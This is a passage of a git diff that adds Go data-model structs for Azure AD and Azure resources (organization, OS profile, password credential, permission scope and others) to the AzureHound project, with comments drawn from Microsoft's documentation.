@@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// Represents an identity used to sign in to a user account. An identity can be provided by Microsoft (a.k.a. local +// account), by organizations, or by 3rd party identity providers such as Facebook or Google that are tied to a user +// account. +// Note: For `$filter` both {@link Issuer} and {@link IssuerAssignedId} must be supplied. +// For more detail, see https://docs.microsoft.com/en-us/graph/api/resources/objectidentity?view=graph-rest-1.0 +type ObjectIdentity struct { + // Specifies the user sign-in types in your directory. + // Federated represents a unique identifier for a user from an issuer, that can be in any format chosen by the + // issuer. + // Setting or updating a UserPrincipalName identity will update the value of the userPrincipalName property on the + // user object. The validations performed on the userPrincipalName property on the user object, for example, + // verified domains and acceptable characters, will be performed when setting or updating a UserPrincipalName + // identity. + // Additional validation is enforced on issuerAssignedId when the sign-in type is set to Email or UserName. + // This property can also be set to any custom string; use string(SignInType) or enums.signintype(someValue) to + // convert appropriately. + SignInType enums.SigninType `json:"signInType,omitempty"` + + // Specifies the issuer of the identity. + // **Notes:** + // * For local accounts where {@link SignInType} is not `federated`, the value is the local B2C tenant default domain + // name. + // * For external users from other Azure AD organizations, this will be the domain of the federated organization. + // + // Supports `$filter` w/ 512 character limit. + Issuer string `json:"issuer,omitempty"` + + // Specifies the unique identifier assigned to the user by the issuer. The combination of issuer and + // issuerAssignedId must be unique within the organization. + // For more detail, see https://docs.microsoft.com/en-us/graph/api/resources/objectidentity?view=graph-rest-1.0 + // + // Supports `$filter` w/ 100 character limit + IssuerAssignedId string `json:"issuerAssignedId,omitempty"` +} diff --git a/models/azure/onprem_ext_attributes.go b/models/azure/onprem_ext_attributes.go new file mode 100644 index 0000000..d5019c0 --- /dev/null +++ b/models/azure/onprem_ext_attributes.go @@ -0,0 +1,48 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The return type of the onPremisesExtensionAttributes property of the user object and extensionAttributes property of +// the device object. +// Returns fifteen custom extension attribute properties. +// +// On the user entity and for an onPremisesSyncEnabled user, the source of authority for this set of properties is the +// on-premises Active Directory which is synchronized to Azure AD, and is read-only. For a cloud-only user (where +// onPremisesSyncEnabled is false), these properties can be set during creation or update. If a cloud-only user was +// previously synced from on-premises Active Directory, these properties cannot be managed via the Microsoft Graph API. +// Instead, they can be managed through the Exchange Admin Center or the Exchange Online V2 module in PowerShell. +// +// The extensionAttributes property of the device entity is managed only in Azure AD during device creation or update. +// Note: These extension attributes are also known as Exchange custom attributes 1-15. +type OnPremisesExtensionAttributes struct { + ExtensionAttribute1 string `json:"extensionAttribute1,omitempty"` + ExtensionAttribute2 string `json:"extensionAttribute2,omitempty"` + ExtensionAttribute3 string `json:"extensionAttribute3,omitempty"` + ExtensionAttribute4 string `json:"extensionAttribute4,omitempty"` + ExtensionAttribute5 string `json:"extensionAttribute5,omitempty"` + ExtensionAttribute6 string `json:"extensionAttribute6,omitempty"` + ExtensionAttribute7 string `json:"extensionAttribute7,omitempty"` + ExtensionAttribute8 string `json:"extensionAttribute8,omitempty"` + ExtensionAttribute9 string `json:"extensionAttribute9,omitempty"` + ExtensionAttribute10 string `json:"extensionAttribute10,omitempty"` + ExtensionAttribute11 string `json:"extensionAttribute11,omitempty"` + ExtensionAttribute12 string `json:"extensionAttribute12,omitempty"` + ExtensionAttribute13 string `json:"extensionAttribute13,omitempty"` + ExtensionAttribute14 string `json:"extensionAttribute14,omitempty"` + ExtensionAttribute15 string `json:"extensionAttribute15,omitempty"` +} diff --git a/models/azure/onprem_provisioning_error.go b/models/azure/onprem_provisioning_error.go new file mode 100644 index 0000000..8bc1b4a --- /dev/null +++ b/models/azure/onprem_provisioning_error.go @@ -0,0 +1,36 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents directory synchronization errors for the user, group and orgContact resources when synchronizing +// on-premises directories to Azure Active Directory. +type OnPremisesProvisioningError struct { + // Category of the provisioning error. Note: Currently, there is only one possible value. + // Possible value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value + // for the property. + Category string `json:"category,omitempty"` + + // The date and time at which the error occurred. + OccurredDateTime string `json:"occurredDateTime,omitempty"` + + // Name of the directory property causing the error. Current possible values: UserPrincipalName or ProxyAddress. + PropertyCausingError string `json:"propertyCausingError,omitempty"` + + // Value of the property causing the error. + Value string `json:"value,omitempty"` +} diff --git a/models/azure/optional_claims.go b/models/azure/optional_claims.go new file mode 100644 index 0000000..542840a --- /dev/null +++ b/models/azure/optional_claims.go @@ -0,0 +1,59 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Contains an optional claim associated with an application . The idToken, accessToken, and saml2Token properties of +// the optionalClaims resource is a collection of optionalClaim. If supported by a specific claim, you can also modify +// the behavior of the optionalClaim using the additionalProperties property. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/optionalclaim?view=graph-rest-1.0 +type OptionalClaim struct { + // Additional properties of the claim. If a property exists in this collection, it modifies the behavior of the + // optional claim specified in the name property. + AdditionalProperties []string `json:"additionalProperties,omitempty"` + + // If the value is true, the claim specified by the client is necessary to ensure a smooth authorization experience + // for the specific task requested by the end user. The default value is false. + Essential bool `json:"essential,omitempty"` + + // The name of the optional claim. + Name string `json:"name,omitempty"` + + // The source (directory object) of the claim. + // There are predefined claims and user-defined claims from extension properties. If the source value is null, the + // claim is a predefined optional claim. If the source value is user, the value in the name property is the + // extension property from the user object. + Source string `json:"source,omitempty"` +} + +// Declares the optional claims requested by an application. An application can configure optional claims to be returned +// in each of three types of tokens (ID token, access token, SAML 2 token) it can receive from the security token +// service. An application can configure a different set of optional claims to be returned in each token type. +// +// Application developers can configure optional claims in their Azure AD apps to specify which claims they want in +// tokens sent to their application by the Microsoft security token service. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/optionalclaims?view=graph-rest-1.0 +type OptionalClaims struct { + // The optional claims returned in the JWT ID token. + IdToken []OptionalClaim `json:"idToken,omitempty"` + + // The optional claims returned in the JWT access token. + AccessToken []OptionalClaim `json:"accessToken,omitempty"` + + // The optional claims returned in the SAML token. + Saml2Token []OptionalClaim `json:"saml2Token,omitempty"` +} diff --git a/models/azure/organization.go b/models/azure/organization.go new file mode 100644 index 0000000..f3d4aeb --- /dev/null +++ b/models/azure/organization.go @@ -0,0 +1,140 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "fmt" +) + +// Represents the Azure Active Directory tenant that the user or application is signed in to +type Organization struct { + DirectoryObject + + // The collection of service plans associated with the tenant + AssignedPlans []AssignedPlan `json:"assignedPlans,omitempty"` + + // Telephone number for the organization. Although this is a string collection, only one number can be set for this + // property. + BusinessPhones []string `json:"businessPhones,omitempty"` + + // City name of the address for the organization. + City string `json:"city,omitempty"` + + // Country or region name of the address for the organization. + Country string `json:"country,omitempty"` + + // Country or region abbreviation for the organization in ISO 3166-2 format. + CountryLetterCode string `json:"countryLetterCode,omitempty"` + + // Timestamp of when the organization was created. The value cannot be modified and is automatically populated when + // the organization is created. The Timestamp type represents date and time information using ISO 8601 format and is + // always in UTC time. For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // + // Read-only. + CreatedDateTime string `json:"createdDateTime,omitempty"` + + // Represents date and time of when the Azure AD tenant was deleted using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // + // Read-only. + DeletedDateTime string `json:"deletedDateTime,omitempty"` + + // The display name for the tenant. + DisplayName string `json:"displayName,omitempty"` + + // `true` if organization is Multi-Geo enabled; false if organization is not Multi-Geo enabled; + // + // null (default). + // Read-only. + IsMultipleDataLocationsForServicesEnabled bool `json:"isMultipleDataLocationsForServicesEnabled,omitempty"` + + MarketingNotificationEmails []string `json:"marketingNotificationEmails,omitempty"` + + // The time and date at which the tenant was last synced with the on-premises directory. + // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // + // Read-only. + OnPremisesLastSyncDateTime string `json:"onPremisesLastSyncDateTime,omitempty"` + + // `true` if this object is synced from an on-premises directory; + // `false` if this object was originally synced from an on-premises directory but is no longer synced. + // `null` if this object has never been synced from an on-premises directory (default). + OnPremisesSyncEnabled *bool `json:"onPremisesSyncEnabled,omitempty"` + + // Postal code of the address for the organization. + PostalCode string `json:"postalCode,omitempty"` + + // The preferred language for the organization. + // Should follow ISO 639-1 Code; for example, `en`. + PreferredLanguage string `json:"preferredLanguage,omitempty"` + + // The privacy profile of an organization. + PrivacyProfile PrivacyProfile `json:"privacyProfile,omitempty"` + + ProvisionedPlans []ProvisionedPlan `json:"provisionedPlans,omitempty"` + + SecurityComplianceNotificationMails []string `json:"securityComplianceNotificationMails,omitempty"` + + SecurityComplianceNotificationPhones []string `json:"securityComplianceNotificationPhones,omitempty"` + + // State name of the address for the organization + State string `json:"state,omitempty"` + + // Street name of the address for the organization. + Street string `json:"streetAddress,omitempty"` + + TechnicalNotificationMails []string `json:"technicalNotificationMails,omitempty"` + + // The tenant type. Only available for 'Home' TenantCategory + TenantType string `json:"tenantType,omitempty"` + + // The collection of domains associated with this tenant. + VerifiedDomains []VerifiedDomain `json:"verifiedDomains,omitempty"` +} + +func (s Organization) ToTenant() Tenant { + var ( + defaultDomain string + domains []string + ) + + for _, domain := range s.VerifiedDomains { + if domain.IsDefault { + defaultDomain = domain.Name + } + domains = append(domains, domain.Name) + } + + return Tenant{ + Country: s.Country, + CountryCode: s.CountryLetterCode, + DefaultDomain: defaultDomain, + DisplayName: s.DisplayName, + Domains: domains, + Id: fmt.Sprintf("/tenants/%s", s.Id), + TenantType: s.TenantType, + TenantId: s.Id, + } +} + +type OrganizationList struct { + Count int `json:"@odata.count,omitempty"` // The total count of all results + NextLink string `json:"@odata.nextLink,omitempty"` // The URL to use for getting the next set of values. + Value []Organization `json:"value"` // A list of organizations. +} diff --git a/models/azure/os_disk.go b/models/azure/os_disk.go new file mode 100644 index 0000000..d43e47e --- /dev/null +++ b/models/azure/os_disk.go @@ -0,0 +1,78 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies information about the operating system disk used by the virtual machine. +// For more information about disks, see About disks and VHDs for Azure virtual machines. +type OSDisk struct { + // Specifies the caching requirements. + // Possible values are: + // None + // ReadOnly + // ReadWrite + // + // Default: None for Standard storage. ReadOnly for Premium storage. + Caching string `json:"caching,omitempty"` + + // Specifies how the virtual machine should be created. + // Possible values are: + // Attach - This value is used when you are using a specialized disk to create the virtual machine. + // FromImage - This value is used when you are using an image to create the virtual machine. If you are using a platform image, you also use the imageReference element described above. If you are using a marketplace image, you also use the plan element previously described. + CreateOption string `json:"createOption,omitempty"` + + // Specifies whether data disk should be deleted or detached upon VM deletion. + // Possible values: + // Delete - If this value is used, the data disk is deleted when VM is deleted. + // Detach - If this value is used, the data disk is retained after VM is deleted. + // The default value is set to detach. For an ephemeral OS Disk, the default value is set to Delete. User cannot change the delete option for ephemeral OS Disk. + DeleteOption string `json:"deleteOption,omitempty"` + + // Specifies the ephemeral Disk Settings for the operating system disk used by the virtual machine. + DiffDiskSettings DiffDiskSettings `json:"diffDiskSettings,omitempty"` + + // Specifies the size of an empty data disk in gigabytes. + // This element can be used to overwrite the size of the disk in a virtual machine image. + // This value cannot be larger than 1023 GB + DiskSizeGB int `json:"diskSizeGB,omitempty"` + + // Specifies the encryption settings for the OS Disk. + // Minimum api-version: 2015-06-15 + EncryptionSettings DiskEncryptionSettings `json:"encryptionSettings,omitempty"` + + // The source user image virtual hard disk. The virtual hard disk will be copied before being attached to the + // virtual machine. If SourceImage is provided, the destination virtual hard drive must not exist. + Image VirtualHardDisk `json:"image,omitempty"` + + // The managed disk parameters. + ManagedDisk ManagedDiskParameters `json:"managedDisk,omitempty"` + + // The disk name. + Name string `json:"name,omitempty"` + + // This property allows you to specify the type of the OS that is included in the disk if creating a VM from user-image or a specialized VHD. + // Possible values are: + // - Windows + // - Linux + OSType string `json:"osType,omitempty"` + + // The virtual hard disk. + Vhd VirtualHardDisk `json:"vhd,omitempty"` + + // Specifies whether writeAccelerator should be enabled or disabled on the disk. + WriteAcceleratorEnabled bool `json:"writeAcceleratorEnabled,omitempty"` +} diff --git a/models/azure/os_profile.go b/models/azure/os_profile.go new file mode 100644 index 0000000..3b95fc6 --- /dev/null +++ b/models/azure/os_profile.go @@ -0,0 +1,80 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the operating system settings for the virtual machine. Some of the settings cannot be changed once VM is +// provisioned. +type OSProfile struct { + // Specifies the password of the administrator account. + // Minimum-length (Windows): 8 characters + // Minimum-length (Linux): 6 characters + // Max-length (Windows): 123 characters + // Max-length (Linux): 72 characters + // Complexity requirements: 3 out of 4 conditions below need to be fulfilled + // Has lower characters + // Has upper characters + // Has a digit + // Has a special character (Regex match [\W_]) + // Disallowed values: "abc@123", "P@$$w0rd", "P@ssw0rd", "P@ssword123", "Pa$$word", "pass@word1", "Password!", "Password1", "Password22", "iloveyou!" + // For resetting the password, see How to reset the Remote Desktop service or its login password in a Windows VM + // For resetting root password, see Manage users, SSH, and check or repair disks on Azure Linux VMs using the VMAccess Extension + AdminPassword string `json:"adminPassword,omitempty,omitempty"` + + // Specifies the name of the administrator account. + // This property cannot be updated after the VM is created. + // Windows-only restriction: Cannot end in "." + // Disallowed values: "administrator", "admin", "user", "user1", "test", "user2", "test1", "user3", "admin1", "1", "123", "a", "actuser", "adm", "admin2", "aspnet", "backup", "console", "david", "guest", "john", "owner", "root", "server", "sql", "support", "support_388945a0", "sys", "test2", "test3", "user4", "user5". + // Minimum-length (Linux): 1 character + // Max-length (Linux): 64 characters + // Max-length (Windows): 20 characters. + AdminUsername string `json:"adminUsername,omitempty,omitempty"` + + // Specifies whether extension operations should be allowed on the virtual machine. + // This may only be set to False when no extensions are present on the virtual machine. + AllowExtensionOperations bool `json:"allowExtensionOperations,omitempty,omitempty"` + + // Specifies the host OS name of the virtual machine. + // This name cannot be updated after the VM is created. + // Max-length (Windows): 15 characters + // Max-length (Linux): 64 characters. + // For naming conventions and restrictions see Azure infrastructure services implementation guidelines. + ComputerName string `json:"computerName,omitempty,omitempty"` + + // Specifies a base-64 encoded string of custom data. The base-64 encoded string is decoded to a binary array that is saved as a file on the Virtual Machine. The maximum length of the binary array is 65535 bytes. + // Note: Do not pass any secrets or passwords in customData property + // This property cannot be updated after the VM is created. + // customData is passed to the VM to be saved as a file, for more information see Custom Data on Azure VMs + // For using cloud-init for your Linux VM, see Using cloud-init to customize a Linux VM during creation + CustomData string `json:"customData,omitempty,omitempty"` + + // Specifies the Linux operating system settings on the virtual machine. + // For a list of supported Linux distributions, see Linux on Azure-Endorsed Distributions. + LinuxConfiguration LinuxConfiguration `json:"linuxConfiguration,omitempty,omitempty"` + + // Specifies whether the guest provision signal is required to infer provision success of the virtual machine. + // Note: This property is for private testing only, and all customers must not set the property to false. + RequireGuestProvisionSignal bool `json:"requireGuestProvisionSignal,omitempty,omitempty"` + + // Specifies set of certificates that should be installed onto the virtual machine. To install certificates on a + // virtual machine it is recommended to use the Azure Key Vault virtual machine extension for Linux or the + // Azure Key Vault virtual machine extension for Windows. + Secrets []VaultSecretGroup `json:"secrets,omitempty,omitempty"` + + // Specifies Windows operating system settings on the virtual machine. + WindowsConfiguration WindowsConfiguration `json:"windowsConfiguration,omitempty,omitempty"` +} diff --git a/models/azure/parent_group_info.go b/models/azure/parent_group_info.go new file mode 100644 index 0000000..0b03dbd --- /dev/null +++ b/models/azure/parent_group_info.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ParentGroupInfo struct { + DisplayName string `json:"displayName,omitempty"` + Id string `json:"id,omitempty"` + Name string `json:"name,omitempty"` +} diff --git a/models/azure/parental_controls_settings.go b/models/azure/parental_controls_settings.go new file mode 100644 index 0000000..a18ebbd --- /dev/null +++ b/models/azure/parental_controls_settings.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// Specifies parental control settings for an application. These settings control the consent experience. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/parentalcontrolsettings?view=graph-rest-1.0 +type ParentalControlSettings struct { + // Specifies the ISO 3166 country codes for which access to the application will be blocked for minors. + CountriesBlockedForMinors []string `json:"countriesBlockedForMinors,omitempty"` + // Specifies the legal age group rule that applies to users of the app. + LegalAgeGroupRule enums.LegalAgeGroupRule `json:"legalAgeGroupRule,omitempty"` +} diff --git a/models/azure/password_credential.go b/models/azure/password_credential.go new file mode 100644 index 0000000..b67b96d --- /dev/null +++ b/models/azure/password_credential.go @@ -0,0 +1,47 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/gofrs/uuid" + +// Represents a password credential associated with an application or a service principal. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/passwordcredential?view=graph-rest-1.0 +type PasswordCredential struct { + // Friendly name for the password. Optional. + DisplayName string `json:"displayName,omitempty"` + + // The date and time at which the password expires represented using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Optional. + EndDateTime string `json:"endDateTime,omitempty"` + + // Contains the first three characters of the password. Read-only. + Hint string `json:"hint,omitempty"` + + // The unique identifier for the password. + KeyId uuid.UUID `json:"keyId,omitempty"` + + // Read-only; Contains the strong passwords generated by Azure AD that are 16-64 characters in length. + // The generated password value is only returned during the initial POST request to addPassword. There is no way to + // retrieve this password in the future. + SecretText string `json:"secretText,omitempty"` + + // The date and time at which the password becomes valid. The Timestamp type represents date and time information + // using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Optional. + StartDateTime string `json:"startDateTime,omitempty"` +} diff --git a/models/azure/password_profile.go b/models/azure/password_profile.go new file mode 100644 index 0000000..9e84fa6 --- /dev/null +++ b/models/azure/password_profile.go @@ -0,0 +1,38 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Contains the password profile associated with a user. +type PasswordProfile struct { + // true if the user must change her password on the next login; otherwise false. If not set, default is false. + // NOTE: For Azure B2C tenants, set to false and instead use custom policies and user flows to force password reset + // at first sign in. + ForceChangePasswordNextSignIn bool `json:"forceChangePasswordNextSignIn,omitempty"` + + // If true, at next sign-in, the user must perform a multi-factor authentication (MFA) before being forced to change + // their password. The behavior is identical to forceChangePasswordNextSignIn except that the user is required to + // first perform a multi-factor authentication before password change. After a password change, this property will + // be automatically reset to false. If not set, default is false. + ForceChangePasswordNextSignInWithMfa bool `json:"forceChangePasswordNextSignInWithMfa,omitempty"` + + // The password for the user. This property is required when a user is created. + // It can be updated, but the user will be required to change the password on the next login. + // The password must satisfy minimum requirements as specified by the user’s passwordPolicies property. + // By default, a strong password is required. + Password string `json:"password,omitempty"` +} diff --git a/models/azure/permission_scope.go b/models/azure/permission_scope.go new file mode 100644 index 0000000..e3f02c2 --- /dev/null +++ b/models/azure/permission_scope.go @@ -0,0 +1,67 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/gofrs/uuid" + +// Represents the definition of a delegated permission. +// +// Delegated permissions can be requested by client applications needing an access token to the API which defined the +// permissions. Delegated permissions can be requested dynamically, using the scopes parameter in an authorization request +// to the Microsoft identity platform, or statically, through the requiredResourceAccess collection on the application +// object. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/permissionscope?view=graph-rest-1.0 +type PermissionScope struct { + // A description of the delegated permissions, intended to be read by an administrator granting the permission on + // behalf of all users. This text appears in tenant-wide admin consent experiences. + AdminConsentDescription string `json:"adminConsentDescription,omitempty"` + + // The permission's title, intended to be read by an administrator granting the permission on behalf of all users. + AdminConsentDisplayName string `json:"adminConsentDisplayName,omitempty"` + + // Unique delegated permission identifier inside the collection of delegated permissions defined for a resource + // application. + Id uuid.UUID `json:"id,omitempty"` + + // When creating or updating a permission, this property must be set to true (which is the default). To delete a + // permission, this property must first be set to false. At that point, in a subsequent call, the permission may be + // removed. + IsEnabled bool `json:"isEnabled,omitempty"` + + // Specifies whether this delegated permission should be considered safe for non-admin users to consent to on behalf + // of themselves, or whether an administrator should be required for consent to the permissions. This will be the + // default behavior, but each customer can choose to customize the behavior in their organization (by allowing, + // restricting or limiting user consent to this delegated permission.) + Type string `json:"type,omitempty"` + + // A description of the delegated permissions, intended to be read by a user granting the permission on their own + // behalf. This text appears in consent experiences where the user is consenting only on behalf of themselves. + UserConsentDescription string `json:"userConsentDescription,omitempty"` + + // A title for the permission, intended to be read by a user granting the permission on their own behalf. This text + // appears in consent experiences where the user is consenting only on behalf of themselves. + UserConsentDisplayName string `json:"userConsentDisplayName,omitempty"` + + // Specifies the value to include in the scp (scope) claim in access tokens. + // Must not exceed 120 characters in length. + // Allowed characters are : ! # $ % & ' ( ) * + , - . / : ; < = > ? @ [ ] ^ + _ ` { | } ~, as well as characters in + // the ranges 0-9, A-Z and a-z. + // Any other character, including the space character, are not allowed. + // May not begin with .. + Value string `json:"value,omitempty"` +} diff --git a/models/azure/plan.go b/models/azure/plan.go new file mode 100644 index 0000000..b529be5 --- /dev/null +++ b/models/azure/plan.go @@ -0,0 +1,37 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies information about the marketplace image used to create the virtual machine. This element is only used for +// marketplace images. Before you can use a marketplace image from an API, you must enable the image for programmatic +// use. In the Azure portal, find the marketplace image that you want to use and then click Want to deploy +// programmatically, Get Started ->. Enter any required information and then click Save. +type Plan struct { + // The plan ID. + Name string `json:"name,omitempty"` + + // Specifies the product of the image from the marketplace. This is the same value as Offer under the imageReference + // element. + Product string `json:"product,omitempty"` + + // The promotion code. + PromotionCode string `json:"promotionCode,omitempty"` + + // The publisher ID. + Publisher string `json:"publisher,omitempty"` +} diff --git a/models/azure/preauthorized_application.go b/models/azure/preauthorized_application.go new file mode 100644 index 0000000..f4561ee --- /dev/null +++ b/models/azure/preauthorized_application.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Lists the client applications that are pre-authorized with the specified permissions to access this application's +// APIs. Users are not required to consent to any pre-authorized application (for the permissions specified). However, +// any additional permissions not listed in preAuthorizedApplications (requested through incremental consent for +// example) will require user consent. +type PreAuthorizedApplication struct { + // The unique identifier for the application. + AppId string `json:"appId,omitempty"` + // The unique identifiers for the OAuth2PermissionScopes the application requires. + PermissionIds []string `json:"permissionIds,omitempty"` + // The unique identifiers for the OAuth2PermissionScopes the application requires. + DelegatedPermissionIds []string `json:"delegatedPermissionIds,omitempty"` +} diff --git a/models/azure/privacy_profile.go b/models/azure/privacy_profile.go new file mode 100644 index 0000000..91f4fb1 --- /dev/null +++ b/models/azure/privacy_profile.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents a company's privacy profile, which includes a privacy statement URL and a contact person for questions +// 